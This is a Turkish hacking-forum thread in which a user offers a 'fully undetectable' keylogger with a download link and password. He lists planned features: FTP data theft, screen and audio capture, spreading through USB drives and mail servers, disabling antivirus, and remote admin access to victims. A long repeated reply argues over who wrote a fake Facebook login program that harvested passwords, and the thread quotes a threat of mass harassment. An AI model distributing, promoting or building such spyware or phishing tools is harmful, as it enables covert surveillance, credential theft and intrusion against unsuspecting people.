DeLeTe Keyloger beta2(Fud ve Güncel)

Program FUD ve Günceldir resimler aşagıda gördüğünüz gibi
giriş şifresi DELETE
programın kodlaması bana Aittir Kullanmak isteyen indirip kullanabilir.

https://tik.lat/7nlwJ

Son düzenleme:
Ben Okdr İyi Bulmadım.Özelliği Az ve THT 'de Bundan Çok Daha İyileri Var.Bunu Sen Yapmışsındır O aYRI.Ama Bana Alıntı Gibi Geldi.Zaten O kadar da İyi Bir Keylogger Diğil.
Ama Sonuçta Ondada Bir Emek Var, Teşekkürler.

Saol Kardeş işime yaradı...!

İşine yaradıysa ne mutlu bana Full sürümde
FTPden bilgi alma,verme
Ekran yakalama
ses transferi
flash disklere ve mail serverlere bulaşma
Antivirüsleri devre dışı bırakma
tıklanan sitelerde imleçle üstüne gelindigin herşeyin ismini alma(video filan)
bide victime admin erişimi ile birlikte dosya transferi ekleyecem

takipte kal lisansli olacak ;)

Ben Okdr İyi Bulmadım.Özelliği Az ve THT 'de Bundan Çok Daha İyileri Var.Bunu Sen Yapmışsındır O aYRI.Ama Bana Alıntı Gibi Geldi.Zaten O kadar da İyi Bir Keylogger Diğil.
Ama Sonuçta Ondada Bir Emek Var, Teşekkürler.

Alinti olsa alinti yazardım Alıntı yapmak facebook koruma yada facebook hack adı altında fake yapıp
kodlarını benden almak ve koddan anlamadıgın için altında ve üstünde benim özel isim verip
yerleştirdigim mail yollamayla ilgisi olmayan karakterleri bile anlamamaktır gelip bir yerlerde boş paylaşım yapmak ve ben kodladım demektir.

http://www.turkhackteam.net/visual-basic/662027-facebook-hack-programi-yapimi.html

bu konudaki kod benim projelerimin birinden alıntı hemde tamamiyle. sana ait degil ne yarısı ne başka bişesi sana kodu veren de senin gibi kod öğrettigim öğrencilerimden biri görsel olarak sadece text butonu ve buton koymak da sana kalmış tabi sonderece de acemice tasarlamışsın öğrenmek istiyorsan gel ben sana öğretirim ben THT de 2008 den beri varım ama kimseden bişey alıp benim diye kimselere yutturmaya kalkmadım bişeyler paylaşıp rütbeli olayım demedim siz yeni gençlik gibi .!
ıspat istiyorsan kodla alakası olmayan iki kod gösterim sana

1. Private msn As New MsgrObject 'Burası Hata Çıkarıyorsa Silin
Private MSNAPI As New MessengerAPI.Messenger 'Bu 2 Yer Hata Çıkarıyorsa Siliniz..

2.lbl.Caption = lbl.Caption + 1

bunların ikisi benim projemden aldıgnın açık ıspatı ki ikisininde ne işe yaradıgını bilmiyorsun
o yüzden koddan çıkarmamışsın

ben sana söyliyim sende öğren ;
1. kodda fake aracılıgıyla giriş yapanları şifresi ve mail adresi dogruysa eski sürüm msnye aktarıp oturum açtırıyordum ve online ofline kişileri listeliyordum ;)

2. kodda gördügün lbl.captionda labelin eşitlemesi +1 olarak eklemesi

hatta 3 olarak kimsede şurası yok benden başka .HTMLbOdy = Text1.Text & Text2.Text
buradaki Text1.text & text2.text biraz iyi araştırsaydın tüm forumlarda ve burda
sadece Text1.text olarak geçer yani tam bir çalıntı yapmışsın ama unutmuşsun
sen 14 yaşındasın 2008 den beri burdayım ;)

yetmediyse senin facebookta ben THT adına burdayım seni heckleriz bir anda 10000 kişi sana saldırırız öyle yaparız böyle yaparız bana bişey diyemezsin çünkü ben THT adına burdayım filan yazdıgını da resimlerle ıspatliyim mi ?

:D bana eleştiri yapacak kişi koddan da anlasın grafiktende sen ne kodlama biliyorsun ne de grafikten anlıyorsun ;)

Alinti olsa alinti yazardım Alıntı yapmak facebook koruma yada facebook hack adı altında fake yapıp
kodlarını benden almak ve koddan anlamadıgın için altında ve üstünde benim özel isim verip
yerleştirdigim mail yollamayla ilgisi olmayan karakterleri bile anlamamaktır gelip bir yerlerde boş paylaşım yapmak ve ben kodladım demektir.

http://www.turkhackteam.net/visual-basic/662027-facebook-hack-programi-yapimi.html

bu konudaki kod benim projelerimin birinden alıntı hemde tamamiyle. sana ait degil ne yarısı ne başka bişesi sana kodu veren de senin gibi kod öğrettigim öğrencilerimden biri görsel olarak sadece text butonu ve buton koymak da sana kalmış tabi sonderece de acemice tasarlamışsın öğrenmek istiyorsan gel ben sana öğretirim ben THT de 2008 den beri varım ama kimseden bişey alıp benim diye kimselere yutturmaya kalkmadım bişeyler paylaşıp rütbeli olayım demedim siz yeni gençlik gibi .!
ıspat istiyorsan kodla alakası olmayan iki kod gösterim sana

1. Private msn As New MsgrObject 'Burası Hata Çıkarıyorsa Silin
Private MSNAPI As New MessengerAPI.Messenger 'Bu 2 Yer Hata Çıkarıyorsa Siliniz..

2.lbl.Caption = lbl.Caption + 1

bunların ikisi benim projemden aldıgnın açık ıspatı ki ikisininde ne işe yaradıgını bilmiyorsun
o yüzden koddan çıkarmamışsın

ben sana söyliyim sende öğren ;
1. kodda fake aracılıgıyla giriş yapanları şifresi ve mail adresi dogruysa eski sürüm msnye aktarıp oturum açtırıyordum ve online ofline kişileri listeliyordum ;)

2. kodda gördügün lbl.captionda labelin eşitlemesi +1 olarak eklemesi

hatta 3 olarak kimsede şurası yok benden başka .HTMLbOdy = Text1.Text & Text2.Text
buradaki Text1.text & text2.text biraz iyi araştırsaydın tüm forumlarda ve burda
sadece Text1.text olarak geçer yani tam bir çalıntı yapmışsın ama unutmuşsun
sen 14 yaşındasın 2008 den beri burdayım ;)

yetmediyse senin facebookta ben THT adına burdayım seni heckleriz bir anda 10000 kişi sana saldırırız öyle yaparız böyle yaparız bana bişey diyemezsin çünkü ben THT adına burdayım filan yazdıgını da resimlerle ıspatliyim mi ?

:D bana eleştiri yapacak kişi koddan da anlasın grafiktende sen ne kodlama biliyorsun ne de grafikten anlıyorsun ;)

Facebook Koruma Paketi Acemiyken Yaptığım Bir Şeyde, Bu 1 Ay Önce Falan...Fakat Şuanla O an Bir Diğil, Bilmem Anlatabildim mi ;)
Fakat Keylogger Hakkında Fikirlerim Aynı...

Geri

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.